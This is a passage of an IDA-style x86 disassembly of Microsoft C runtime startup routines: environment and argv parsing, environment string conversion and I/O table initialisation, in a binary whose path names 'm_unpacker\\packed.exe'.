push ecx
mov eax, [ebp+arg_4]
mov [ebp+var_4], eax
loc_42512A: ; CODE XREF: sub_425120+30�j
mov ecx, [ebp+var_4]
mov edx, [ecx]
cmp edx, [ebp+arg_0]
jz short loc_425152
mov eax, [ebp+var_4]
add eax, 0Ch
mov [ebp+var_4], eax
mov ecx, dword_443654
imul ecx, 0Ch
mov edx, [ebp+arg_4]
add edx, ecx
cmp [ebp+var_4], edx
jnb short loc_425152
jmp short loc_42512A
; ---------------------------------------------------------------------------
loc_425152: ; CODE XREF: sub_425120+12�j
; sub_425120+2E�j
mov eax, dword_443654
imul eax, 0Ch
mov ecx, [ebp+arg_4]
add ecx, eax
cmp [ebp+var_4], ecx
jnb short loc_42516E
mov edx, [ebp+var_4]
mov eax, [edx]
cmp eax, [ebp+arg_0]
jz short loc_425172
loc_42516E: ; CODE XREF: sub_425120+42�j
xor eax, eax
jmp short loc_425175
; ---------------------------------------------------------------------------
loc_425172: ; CODE XREF: sub_425120+4C�j
mov eax, [ebp+var_4]
loc_425175: ; CODE XREF: sub_425120+50�j
mov esp, ebp
pop ebp
retn
sub_425120 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_425180 proc near ; CODE XREF: sub_41B970+E8�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
cmp dword_49378C, 0
jnz short loc_425192
call sub_4249A0
loc_425192: ; CODE XREF: sub_425180+B�j
mov eax, dword_493784
mov [ebp+var_4], eax
mov ecx, [ebp+var_4]
xor edx, edx
mov dl, [ecx]
cmp edx, 22h
jnz short loc_4251FC
loc_4251A6: ; CODE XREF: sub_425180:loc_4251E3�j
mov eax, [ebp+var_4]
add eax, 1
mov [ebp+var_4], eax
mov ecx, [ebp+var_4]
xor edx, edx
mov dl, [ecx]
cmp edx, 22h
jz short loc_4251E5
mov eax, [ebp+var_4]
xor ecx, ecx
mov cl, [eax]
test ecx, ecx
jz short loc_4251E5
mov edx, [ebp+var_4]
xor eax, eax
mov al, [edx]
push eax
call sub_42C4A0
add esp, 4
test eax, eax
jz short loc_4251E3
mov ecx, [ebp+var_4]
add ecx, 1
mov [ebp+var_4], ecx
loc_4251E3: ; CODE XREF: sub_425180+58�j
jmp short loc_4251A6
; ---------------------------------------------------------------------------
loc_4251E5: ; CODE XREF: sub_425180+39�j
; sub_425180+44�j
mov edx, [ebp+var_4]
xor eax, eax
mov al, [edx]
cmp eax, 22h
jnz short loc_4251FA
mov ecx, [ebp+var_4]
add ecx, 1
mov [ebp+var_4], ecx
loc_4251FA: ; CODE XREF: sub_425180+6F�j
jmp short loc_425213
; ---------------------------------------------------------------------------
loc_4251FC: ; CODE XREF: sub_425180+24�j
; sub_425180+91�j
mov edx, [ebp+var_4]
xor eax, eax
mov al, [edx]
cmp eax, 20h
jle short loc_425213
mov ecx, [ebp+var_4]
add ecx, 1
mov [ebp+var_4], ecx
jmp short loc_4251FC
; ---------------------------------------------------------------------------
loc_425213: ; CODE XREF: sub_425180:loc_4251FA�j
; sub_425180+86�j ...
mov edx, [ebp+var_4]
xor eax, eax
mov al, [edx]
test eax, eax
jz short loc_425235
mov ecx, [ebp+var_4]
xor edx, edx
mov dl, [ecx]
cmp edx, 20h
jg short loc_425235
mov eax, [ebp+var_4]
add eax, 1
mov [ebp+var_4], eax
jmp short loc_425213
; ---------------------------------------------------------------------------
loc_425235: ; CODE XREF: sub_425180+9C�j
; sub_425180+A8�j
mov eax, [ebp+var_4]
mov esp, ebp
pop ebp
retn
sub_425180 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_425240 proc near ; CODE XREF: sub_41B970+CD�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 10h
loc_425246: ; DATA XREF: .data:00443894�o
cmp dword_49378C, 0
jnz short loc_425254
call sub_4249A0
loc_425254: ; CODE XREF: sub_425240+D�j
mov [ebp+var_8], 0
mov eax, dword_4920D8
mov [ebp+var_4], eax
loc_425263: ; CODE XREF: sub_425240+57�j
mov ecx, [ebp+var_4]
movsx edx, byte ptr [ecx]
test edx, edx
jz short loc_425299
mov eax, [ebp+var_4]
movsx ecx, byte ptr [eax]
cmp ecx, 3Dh
jz short loc_425281
mov edx, [ebp+var_8]
add edx, 1
mov [ebp+var_8], edx
loc_425281: ; CODE XREF: sub_425240+36�j
mov eax, [ebp+var_4]
push eax
call sub_418E70
add esp, 4
mov ecx, [ebp+var_4]
lea edx, [ecx+eax+1]
mov [ebp+var_4], edx
jmp short loc_425263
; ---------------------------------------------------------------------------
loc_425299: ; CODE XREF: sub_425240+2B�j
push 6Dh
push offset aStdenvp_c ; "stdenvp.c"
push 2
mov eax, [ebp+var_8]
lea ecx, ds:4[eax*4]
push ecx
call sub_416A30
add esp, 10h
mov [ebp+var_C], eax
mov edx, [ebp+var_C]
mov dword_4920B0, edx
cmp dword_4920B0, 0
jnz short loc_4252D4
push 9
call sub_41BAE0
add esp, 4
loc_4252D4: ; CODE XREF: sub_425240+88�j
mov eax, dword_4920D8
mov [ebp+var_4], eax
jmp short loc_4252E7
; ---------------------------------------------------------------------------
loc_4252DE: ; CODE XREF: sub_425240:loc_425355�j
mov ecx, [ebp+var_4]
add ecx, [ebp+var_10]
mov [ebp+var_4], ecx
loc_4252E7: ; CODE XREF: sub_425240+9C�j
mov edx, [ebp+var_4]
movsx eax, byte ptr [edx]
test eax, eax
jz short loc_425357
mov ecx, [ebp+var_4]
push ecx
call sub_418E70
add esp, 4
add eax, 1
mov [ebp+var_10], eax
mov edx, [ebp+var_4]
movsx eax, byte ptr [edx]
cmp eax, 3Dh
jz short loc_425355
push 79h
push offset aStdenvp_c ; "stdenvp.c"
push 2
mov ecx, [ebp+var_10]
push ecx
call sub_416A30
add esp, 10h
mov edx, [ebp+var_C]
mov [edx], eax
mov eax, [ebp+var_C]
cmp dword ptr [eax], 0
jnz short loc_42533A
push 9
call sub_41BAE0
add esp, 4
loc_42533A: ; CODE XREF: sub_425240+EE�j
mov ecx, [ebp+var_4]
push ecx
mov edx, [ebp+var_C]
mov eax, [edx]
push eax
call sub_419FA0
add esp, 8
mov ecx, [ebp+var_C]
add ecx, 4
mov [ebp+var_C], ecx
loc_425355: ; CODE XREF: sub_425240+CC�j
jmp short loc_4252DE
; ---------------------------------------------------------------------------
loc_425357: ; CODE XREF: sub_425240+AF�j
push 2
mov edx, dword_4920D8
push edx
call sub_4174C0
add esp, 8
mov dword_4920D8, 0
mov eax, [ebp+var_C]
mov dword ptr [eax], 0
mov dword_493788, 1
mov esp, ebp
pop ebp
retn
sub_425240 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_425390 proc near ; CODE XREF: sub_41B970+C8�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 14h
cmp dword_49378C, 0
jnz short loc_4253A4
call sub_4249A0
loc_4253A4: ; CODE XREF: sub_425390+D�j
push 104h
push offset aCM_unpackerPac ; "C:\\m_unpacker\\packed.exe"
push 0
call ds:dword_4942F8
mov off_4920C0, offset aCM_unpackerPac ; "C:\\m_unpacker\\packed.exe"
mov eax, dword_493784
movsx ecx, byte ptr [eax]
test ecx, ecx
jnz short loc_4253D7
mov edx, off_4920C0
mov [ebp+var_14], edx
jmp short loc_4253DF
; ---------------------------------------------------------------------------
loc_4253D7: ; CODE XREF: sub_425390+3A�j
mov eax, dword_493784
mov [ebp+var_14], eax
loc_4253DF: ; CODE XREF: sub_425390+45�j
mov ecx, [ebp+var_14]
mov [ebp+var_10], ecx
lea edx, [ebp+var_4]
push edx
lea eax, [ebp+var_C]
push eax
push 0
push 0
mov ecx, [ebp+var_10]
push ecx
call sub_425470
add esp, 14h
push 80h
push offset aStdargv_c ; "stdargv.c"
push 2
mov edx, [ebp+var_C]
mov eax, [ebp+var_4]
lea ecx, [eax+edx*4]
push ecx
call sub_416A30
add esp, 10h
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jnz short loc_42542E
push 8
call sub_41BAE0
add esp, 4
loc_42542E: ; CODE XREF: sub_425390+92�j
lea edx, [ebp+var_4]
push edx
lea eax, [ebp+var_C]
push eax
mov ecx, [ebp+var_C]
mov edx, [ebp+var_8]
lea eax, [edx+ecx*4]
push eax
mov ecx, [ebp+var_8]
push ecx
mov edx, [ebp+var_10]
push edx
call sub_425470
add esp, 14h
mov eax, [ebp+var_C]
sub eax, 1
mov dword_4920A4, eax
mov ecx, [ebp+var_8]
mov dword_4920A8, ecx
mov esp, ebp
pop ebp
retn
sub_425390 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_425470 proc near ; CODE XREF: sub_425390+65�p
; sub_425390+B8�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 14h
mov eax, [ebp+arg_10]
mov dword ptr [eax], 0
mov ecx, [ebp+arg_C]
mov dword ptr [ecx], 1
mov edx, [ebp+arg_0]
mov [ebp+var_4], edx
cmp [ebp+arg_4], 0
jz short loc_4254A5
mov eax, [ebp+arg_4]
mov ecx, [ebp+arg_8]
mov [eax], ecx
mov edx, [ebp+arg_4]
add edx, 4
mov [ebp+arg_4], edx
loc_4254A5: ; CODE XREF: sub_425470+22�j
mov eax, [ebp+var_4]
movsx ecx, byte ptr [eax]
cmp ecx, 22h
jnz loc_42557D
loc_4254B4: ; CODE XREF: sub_425470:loc_42553D�j
mov edx, [ebp+var_4]
add edx, 1
mov [ebp+var_4], edx
mov eax, [ebp+var_4]
movsx ecx, byte ptr [eax]
cmp ecx, 22h
jz short loc_425542
mov edx, [ebp+var_4]
movsx eax, byte ptr [edx]
test eax, eax
jz short loc_425542
mov ecx, [ebp+var_4]
xor edx, edx
mov dl, [ecx]
xor eax, eax
mov al, byte_492641[edx]
and eax, 4
test eax, eax
jz short loc_425517
mov ecx, [ebp+arg_10]
mov edx, [ecx]
add edx, 1
mov eax, [ebp+arg_10]
mov [eax], edx
cmp [ebp+arg_8], 0
jz short loc_425517
mov ecx, [ebp+arg_8]
mov edx, [ebp+var_4]
mov al, [edx]
mov [ecx], al
mov ecx, [ebp+arg_8]
add ecx, 1
mov [ebp+arg_8], ecx
mov edx, [ebp+var_4]
add edx, 1
mov [ebp+var_4], edx
loc_425517: ; CODE XREF: sub_425470+76�j
; sub_425470+89�j
mov eax, [ebp+arg_10]
mov ecx, [eax]
add ecx, 1
mov edx, [ebp+arg_10]
mov [edx], ecx
cmp [ebp+arg_8], 0
jz short loc_42553D
mov eax, [ebp+arg_8]
mov ecx, [ebp+var_4]
mov dl, [ecx]
mov [eax], dl
mov eax, [ebp+arg_8]
add eax, 1
mov [ebp+arg_8], eax
loc_42553D: ; CODE XREF: sub_425470+B8�j
jmp loc_4254B4
; ---------------------------------------------------------------------------
loc_425542: ; CODE XREF: sub_425470+56�j
; sub_425470+60�j
mov ecx, [ebp+arg_10]
mov edx, [ecx]
add edx, 1
mov eax, [ebp+arg_10]
mov [eax], edx
cmp [ebp+arg_8], 0
jz short loc_425564
mov ecx, [ebp+arg_8]
mov byte ptr [ecx], 0
mov edx, [ebp+arg_8]
add edx, 1
mov [ebp+arg_8], edx
loc_425564: ; CODE XREF: sub_425470+E3�j
mov eax, [ebp+var_4]
movsx ecx, byte ptr [eax]
cmp ecx, 22h
jnz short loc_425578
mov edx, [ebp+var_4]
add edx, 1
mov [ebp+var_4], edx
loc_425578: ; CODE XREF: sub_425470+FD�j
jmp loc_42564C
; ---------------------------------------------------------------------------
loc_42557D: ; CODE XREF: sub_425470+3E�j
; sub_425470+1B1�j
mov eax, [ebp+arg_10]
mov ecx, [eax]
add ecx, 1
mov edx, [ebp+arg_10]
mov [edx], ecx
cmp [ebp+arg_8], 0
jz short loc_4255A3
mov eax, [ebp+arg_8]
mov ecx, [ebp+var_4]
mov dl, [ecx]
mov [eax], dl
mov eax, [ebp+arg_8]
add eax, 1
mov [ebp+arg_8], eax
loc_4255A3: ; CODE XREF: sub_425470+11E�j
mov ecx, [ebp+var_4]
mov dl, [ecx]
mov byte ptr [ebp+var_C], dl
mov eax, [ebp+var_4]
add eax, 1
mov [ebp+var_4], eax
mov ecx, [ebp+var_C]
and ecx, 0FFh
xor edx, edx
mov dl, byte_492641[ecx]
and edx, 4
test edx, edx
jz short loc_4255FB
mov eax, [ebp+arg_10]
mov ecx, [eax]
add ecx, 1
mov edx, [ebp+arg_10]
mov [edx], ecx
cmp [ebp+arg_8], 0
jz short loc_4255F2
mov eax, [ebp+arg_8]
mov ecx, [ebp+var_4]
mov dl, [ecx]
mov [eax], dl
mov eax, [ebp+arg_8]
add eax, 1
mov [ebp+arg_8], eax
loc_4255F2: ; CODE XREF: sub_425470+16D�j
mov ecx, [ebp+var_4]
add ecx, 1
mov [ebp+var_4], ecx
loc_4255FB: ; CODE XREF: sub_425470+15A�j
mov edx, [ebp+var_C]
and edx, 0FFh
cmp edx, 20h
jz short loc_425627
mov eax, [ebp+var_C]
and eax, 0FFh
test eax, eax
jz short loc_425627
mov ecx, [ebp+var_C]
and ecx, 0FFh
cmp ecx, 9
jnz loc_42557D
loc_425627: ; CODE XREF: sub_425470+197�j
; sub_425470+1A3�j
mov edx, [ebp+var_C]
and edx, 0FFh
test edx, edx
jnz short loc_42563F
mov eax, [ebp+var_4]
sub eax, 1
mov [ebp+var_4], eax
jmp short loc_42564C
; ---------------------------------------------------------------------------
loc_42563F: ; CODE XREF: sub_425470+1C2�j
cmp [ebp+arg_8], 0
jz short loc_42564C
mov ecx, [ebp+arg_8]
mov byte ptr [ecx-1], 0
loc_42564C: ; CODE XREF: sub_425470:loc_425578�j
; sub_425470+1CD�j ...
mov [ebp+var_14], 0
loc_425653: ; CODE XREF: sub_425470+3F6�j
mov edx, [ebp+var_4]
movsx eax, byte ptr [edx]
test eax, eax
jz short loc_42567E
loc_42565D: ; CODE XREF: sub_425470+20C�j
mov ecx, [ebp+var_4]
movsx edx, byte ptr [ecx]
cmp edx, 20h
jz short loc_425673
mov eax, [ebp+var_4]
movsx ecx, byte ptr [eax]
cmp ecx, 9
jnz short loc_42567E
loc_425673: ; CODE XREF: sub_425470+1F6�j
mov edx, [ebp+var_4]
add edx, 1
mov [ebp+var_4], edx
jmp short loc_42565D
; ---------------------------------------------------------------------------
loc_42567E: ; CODE XREF: sub_425470+1EB�j
; sub_425470+201�j
mov eax, [ebp+var_4]
movsx ecx, byte ptr [eax]
test ecx, ecx
jnz short loc_42568D
jmp loc_42586B
; ---------------------------------------------------------------------------
loc_42568D: ; CODE XREF: sub_425470+216�j
cmp [ebp+arg_4], 0
jz short loc_4256A4
mov edx, [ebp+arg_4]
mov eax, [ebp+arg_8]
mov [edx], eax
mov ecx, [ebp+arg_4]
add ecx, 4
mov [ebp+arg_4], ecx
loc_4256A4: ; CODE XREF: sub_425470+221�j
mov edx, [ebp+arg_C]
mov eax, [edx]
add eax, 1
mov ecx, [ebp+arg_C]
mov [ecx], eax
loc_4256B1: ; CODE XREF: sub_425470+3CF�j
mov [ebp+var_8], 1
mov [ebp+var_10], 0
loc_4256BF: ; CODE XREF: sub_425470+26C�j
mov edx, [ebp+var_4]
movsx eax, byte ptr [edx]
cmp eax, 5Ch
jnz short loc_4256DE
mov ecx, [ebp+var_4]
add ecx, 1
mov [ebp+var_4], ecx
mov edx, [ebp+var_10]
add edx, 1
mov [ebp+var_10], edx
jmp short loc_4256BF
; ---------------------------------------------------------------------------
loc_4256DE: ; CODE XREF: sub_425470+258�j
mov eax, [ebp+var_4]
movsx ecx, byte ptr [eax]
cmp ecx, 22h
jnz short loc_42573A
mov eax, [ebp+var_10]
xor edx, edx
mov ecx, 2
div ecx
test edx, edx
jnz short loc_425732
cmp [ebp+var_14], 0
jz short loc_42571F
mov edx, [ebp+var_4]
movsx eax, byte ptr [edx+1]
cmp eax, 22h
jnz short loc_425716
mov ecx, [ebp+var_4]
add ecx, 1
mov [ebp+var_4], ecx
jmp short loc_42571D
; ---------------------------------------------------------------------------
loc_425716: ; CODE XREF: sub_425470+299�j
mov [ebp+var_8], 0
loc_42571D: ; CODE XREF: sub_425470+2A4�j
jmp short loc_425726
; ---------------------------------------------------------------------------
loc_42571F: ; CODE XREF: sub_425470+28D�j
mov [ebp+var_8], 0
loc_425726: ; CODE XREF: sub_425470:loc_42571D�j
xor edx, edx
cmp [ebp+var_14], 0
setz dl
mov [ebp+var_14], edx
loc_425732: ; CODE XREF: sub_425470+287�j
mov eax, [ebp+var_10]
shr eax, 1
mov [ebp+var_10], eax
loc_42573A: ; CODE XREF: sub_425470+277�j
; sub_425470+2FC�j
mov ecx, [ebp+var_10]
mov edx, [ebp+var_10]
sub edx, 1
mov [ebp+var_10], edx
test ecx, ecx
jz short loc_42576E
cmp [ebp+arg_8], 0
jz short loc_42575F
mov eax, [ebp+arg_8]
mov byte ptr [eax], 5Ch
mov ecx, [ebp+arg_8]
add ecx, 1
mov [ebp+arg_8], ecx
loc_42575F: ; CODE XREF: sub_425470+2DE�j
mov edx, [ebp+arg_10]
mov eax, [edx]
add eax, 1
mov ecx, [ebp+arg_10]
mov [ecx], eax
jmp short loc_42573A
; ---------------------------------------------------------------------------
loc_42576E: ; CODE XREF: sub_425470+2D8�j
mov edx, [ebp+var_4]
movsx eax, byte ptr [edx]
test eax, eax
jz short loc_425794
cmp [ebp+var_14], 0
jnz short loc_425799
mov ecx, [ebp+var_4]
movsx edx, byte ptr [ecx]
cmp edx, 20h
jz short loc_425794
mov eax, [ebp+var_4]
movsx ecx, byte ptr [eax]
cmp ecx, 9
jnz short loc_425799
loc_425794: ; CODE XREF: sub_425470+306�j
; sub_425470+317�j
jmp loc_425844
; ---------------------------------------------------------------------------
loc_425799: ; CODE XREF: sub_425470+30C�j
; sub_425470+322�j
cmp [ebp+var_8], 0
jz loc_425836
cmp [ebp+arg_8], 0
jz short loc_4257FD
mov edx, [ebp+var_4]
xor eax, eax
mov al, [edx]
xor ecx, ecx
mov cl, byte_492641[eax]
and ecx, 4
test ecx, ecx
jz short loc_4257E8
mov edx, [ebp+arg_8]
mov eax, [ebp+var_4]
mov cl, [eax]
mov [edx], cl
mov edx, [ebp+arg_8]
add edx, 1
mov [ebp+arg_8], edx
mov eax, [ebp+var_4]
add eax, 1
mov [ebp+var_4], eax
mov ecx, [ebp+arg_10]
mov edx, [ecx]
add edx, 1
mov eax, [ebp+arg_10]
mov [eax], edx
loc_4257E8: ; CODE XREF: sub_425470+34D�j
mov ecx, [ebp+arg_8]
mov edx, [ebp+var_4]
mov al, [edx]
mov [ecx], al
mov ecx, [ebp+arg_8]
add ecx, 1
mov [ebp+arg_8], ecx
jmp short loc_425829
; ---------------------------------------------------------------------------
loc_4257FD: ; CODE XREF: sub_425470+337�j
mov edx, [ebp+var_4]
xor eax, eax
mov al, [edx]
xor ecx, ecx
mov cl, byte_492641[eax]
and ecx, 4
test ecx, ecx
jz short loc_425829
mov edx, [ebp+var_4]
add edx, 1
mov [ebp+var_4], edx
mov eax, [ebp+arg_10]
mov ecx, [eax]
add ecx, 1
mov edx, [ebp+arg_10]
mov [edx], ecx
loc_425829: ; CODE XREF: sub_425470+38B�j
; sub_425470+3A1�j
mov eax, [ebp+arg_10]
mov ecx, [eax]
add ecx, 1
mov edx, [ebp+arg_10]
mov [edx], ecx
loc_425836: ; CODE XREF: sub_425470+32D�j
mov eax, [ebp+var_4]
add eax, 1
mov [ebp+var_4], eax
jmp loc_4256B1
; ---------------------------------------------------------------------------
loc_425844: ; CODE XREF: sub_425470:loc_425794�j
cmp [ebp+arg_8], 0
jz short loc_425859
mov ecx, [ebp+arg_8]
mov byte ptr [ecx], 0
mov edx, [ebp+arg_8]
add edx, 1
mov [ebp+arg_8], edx
loc_425859: ; CODE XREF: sub_425470+3D8�j
mov eax, [ebp+arg_10]
mov ecx, [eax]
add ecx, 1
mov edx, [ebp+arg_10]
mov [edx], ecx
jmp loc_425653
; ---------------------------------------------------------------------------
loc_42586B: ; CODE XREF: sub_425470+218�j
cmp [ebp+arg_4], 0
jz short loc_425883
mov eax, [ebp+arg_4]
mov dword ptr [eax], 0
mov ecx, [ebp+arg_4]
add ecx, 4
mov [ebp+arg_4], ecx
loc_425883: ; CODE XREF: sub_425470+3FF�j
mov edx, [ebp+arg_C]
mov eax, [edx]
add eax, 1
mov ecx, [ebp+arg_C]
mov [ecx], eax
mov esp, ebp
pop ebp
retn
sub_425470 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4258A0 proc near ; CODE XREF: sub_41B970+BE�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 18h
mov [ebp+var_14], 0
mov [ebp+var_18], 0
cmp dword_492298, 0
jnz short loc_4258FA
call ds:dword_494498
mov [ebp+var_14], eax
cmp [ebp+var_14], 0
jz short loc_4258D8
mov dword_492298, 1
jmp short loc_4258FA
; ---------------------------------------------------------------------------
loc_4258D8: ; CODE XREF: sub_4258A0+2A�j
call ds:dword_494494
mov [ebp+var_18], eax
cmp [ebp+var_18], 0
jz short loc_4258F3
mov dword_492298, 2
jmp short loc_4258FA
; ---------------------------------------------------------------------------
loc_4258F3: ; CODE XREF: sub_4258A0+45�j
xor eax, eax
jmp loc_425AB5
; ---------------------------------------------------------------------------
loc_4258FA: ; CODE XREF: sub_4258A0+1B�j
; sub_4258A0+36�j ...
cmp dword_492298, 1
jnz loc_4259FE
cmp [ebp+var_14], 0
jnz short loc_425923
call ds:dword_494498
mov [ebp+var_14], eax
cmp [ebp+var_14], 0
jnz short loc_425923
xor eax, eax
jmp loc_425AB5
; ---------------------------------------------------------------------------
loc_425923: ; CODE XREF: sub_4258A0+6B�j
; sub_4258A0+7A�j
mov eax, [ebp+var_14]
mov [ebp+var_8], eax
loc_425929: ; CODE XREF: sub_4258A0:loc_425953�j
mov ecx, [ebp+var_8]
xor edx, edx
mov dx, [ecx]
test edx, edx
jz short loc_425955
mov eax, [ebp+var_8]
add eax, 2
mov [ebp+var_8], eax
mov ecx, [ebp+var_8]
xor edx, edx
mov dx, [ecx]
test edx, edx
jnz short loc_425953
mov eax, [ebp+var_8]
add eax, 2
mov [ebp+var_8], eax
loc_425953: ; CODE XREF: sub_4258A0+A8�j
jmp short loc_425929
; ---------------------------------------------------------------------------
loc_425955: ; CODE XREF: sub_4258A0+93�j
mov ecx, [ebp+var_8]
sub ecx, [ebp+var_14]
sar ecx, 1
add ecx, 1
mov [ebp+var_4], ecx
push 0
push 0
push 0
push 0
mov edx, [ebp+var_4]
push edx
mov eax, [ebp+var_14]
push eax
push 0
push 0
call ds:dword_4943B0
mov [ebp+var_10], eax
cmp [ebp+var_10], 0
jz short loc_4259A4
push 64h
push offset aA_env_c ; "a_env.c"
push 2
mov ecx, [ebp+var_10]
push ecx
call sub_416A30
add esp, 10h
mov [ebp+var_18], eax
cmp [ebp+var_18], 0
jnz short loc_4259B5
loc_4259A4: ; CODE XREF: sub_4258A0+E4�j
mov edx, [ebp+var_14]
push edx
call ds:dword_494490
xor eax, eax
jmp loc_425AB5
; ---------------------------------------------------------------------------
loc_4259B5: ; CODE XREF: sub_4258A0+102�j
push 0
push 0
mov eax, [ebp+var_10]
push eax
mov ecx, [ebp+var_18]
push ecx
mov edx, [ebp+var_4]
push edx
mov eax, [ebp+var_14]
push eax
push 0
push 0
call ds:dword_4943B0
test eax, eax
jnz short loc_4259EC
push 2
mov ecx, [ebp+var_18]
push ecx
call sub_4174C0
add esp, 8
mov [ebp+var_18], 0
loc_4259EC: ; CODE XREF: sub_4258A0+135�j
mov edx, [ebp+var_14]
push edx
call ds:dword_494490
mov eax, [ebp+var_18]
jmp loc_425AB5
; ---------------------------------------------------------------------------
loc_4259FE: ; CODE XREF: sub_4258A0+61�j
cmp dword_492298, 2
jnz loc_425AB3
cmp [ebp+var_18], 0
jnz short loc_425A27
call ds:dword_494494
mov [ebp+var_18], eax
cmp [ebp+var_18], 0
jnz short loc_425A27
xor eax, eax
jmp loc_425AB5
; ---------------------------------------------------------------------------
loc_425A27: ; CODE XREF: sub_4258A0+16F�j
; sub_4258A0+17E�j
mov eax, [ebp+var_18]
mov [ebp+var_C], eax
loc_425A2D: ; CODE XREF: sub_4258A0:loc_425A53�j
mov ecx, [ebp+var_C]
movsx edx, byte ptr [ecx]
test edx, edx
jz short loc_425A55
mov eax, [ebp+var_C]
add eax, 1
mov [ebp+var_C], eax
mov ecx, [ebp+var_C]
movsx edx, byte ptr [ecx]
test edx, edx
jnz short loc_425A53
mov eax, [ebp+var_C]
add eax, 1
mov [ebp+var_C], eax
loc_425A53: ; CODE XREF: sub_4258A0+1A8�j
jmp short loc_425A2D
; ---------------------------------------------------------------------------
loc_425A55: ; CODE XREF: sub_4258A0+195�j
mov ecx, [ebp+var_C]
sub ecx, [ebp+var_18]
add ecx, 1
mov [ebp+var_10], ecx
push 8Fh
push offset aA_env_c ; "a_env.c"
push 2
mov edx, [ebp+var_10]
push edx
call sub_416A30
add esp, 10h
mov [ebp+var_C], eax
cmp [ebp+var_C], 0
jnz short loc_425A90
mov eax, [ebp+var_18]
push eax
call ds:dword_49448C
xor eax, eax
jmp short loc_425AB5
; ---------------------------------------------------------------------------
loc_425A90: ; CODE XREF: sub_4258A0+1E0�j
mov ecx, [ebp+var_10]
push ecx
mov edx, [ebp+var_18]
push edx
mov eax, [ebp+var_C]
push eax
call sub_418A00
add esp, 0Ch
mov ecx, [ebp+var_18]
push ecx
call ds:dword_49448C
mov eax, [ebp+var_C]
jmp short loc_425AB5
; ---------------------------------------------------------------------------
loc_425AB3: ; CODE XREF: sub_4258A0+165�j
xor eax, eax
loc_425AB5: ; CODE XREF: sub_4258A0+55�j
; sub_4258A0+7E�j ...
mov esp, ebp
pop ebp
retn
sub_4258A0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_425AC0 proc near ; CODE XREF: sub_41B970+AE�p
var_6C = dword ptr -6Ch
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = byte ptr -48h
var_16 = dword ptr -16h
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 6Ch
push 81h
push offset aIoinit_c ; "ioinit.c"
push 2
push 480h
call sub_416A30
add esp, 10h
mov [ebp+var_50], eax
cmp [ebp+var_50], 0
jnz short loc_425AF2
push 1Bh
call sub_41BAE0
add esp, 4
loc_425AF2: ; CODE XREF: sub_425AC0+26�j
mov eax, [ebp+var_50]
mov dword_492420, eax
mov dword_492520, 20h
jmp short loc_425B0F
; ---------------------------------------------------------------------------
loc_425B06: ; CODE XREF: sub_425AC0+81�j
mov ecx, [ebp+var_50]
add ecx, 24h
mov [ebp+var_50], ecx
loc_425B0F: ; CODE XREF: sub_425AC0+44�j
mov edx, dword_492420
add edx, 480h
cmp [ebp+var_50], edx
jnb short loc_425B43
mov eax, [ebp+var_50]
mov byte ptr [eax+4], 0
mov ecx, [ebp+var_50]
mov dword ptr [ecx], 0FFFFFFFFh
mov edx, [ebp+var_50]
mov byte ptr [edx+5], 0Ah
mov eax, [ebp+var_50]
mov dword ptr [eax+8], 0
jmp short loc_425B06
; ---------------------------------------------------------------------------
loc_425B43: ; CODE XREF: sub_425AC0+5E�j
lea ecx, [ebp+var_48]
push ecx
call ds:dword_494424
mov edx, [ebp+var_16]
and edx, 0FFFFh
test edx, edx
jz loc_425CE5
cmp [ebp+var_16+2], 0
jz loc_425CE5
mov eax, [ebp+var_16+2]
mov ecx, [eax]
mov [ebp+var_64], ecx
mov edx, [ebp+var_16+2]
add edx, 4
mov [ebp+var_4], edx
mov eax, [ebp+var_4]
add eax, [ebp+var_64]
mov [ebp+var_60], eax
cmp [ebp+var_64], 800h
jge short loc_425B93
mov ecx, [ebp+var_64]
mov [ebp+var_68], ecx
jmp short loc_425B9A
; ---------------------------------------------------------------------------
loc_425B93: ; CODE XREF: sub_425AC0+C9�j
mov [ebp+var_68], 800h
loc_425B9A: ; CODE XREF: sub_425AC0+D1�j
mov edx, [ebp+var_68]
mov [ebp+var_64], edx
mov [ebp+var_5C], 1
jmp short loc_425BB2
; ---------------------------------------------------------------------------
loc_425BA9: ; CODE XREF: sub_425AC0:loc_425C4D�j
mov eax, [ebp+var_5C]
add eax, 1
mov [ebp+var_5C], eax
loc_425BB2: ; CODE XREF: sub_425AC0+E7�j
mov ecx, dword_492520
cmp ecx, [ebp+var_64]
jge loc_425C52
push 0B6h
push offset aIoinit_c ; "ioinit.c"
push 2
push 480h
call sub_416A30
add esp, 10h
mov [ebp+var_50], eax
cmp [ebp+var_50], 0
jnz short loc_425BEE
mov edx, dword_492520
mov [ebp+var_64], edx
jmp short loc_425C52
; ---------------------------------------------------------------------------
loc_425BEE: ; CODE XREF: sub_425AC0+121�j
mov eax, [ebp+var_5C]
mov ecx, [ebp+var_50]
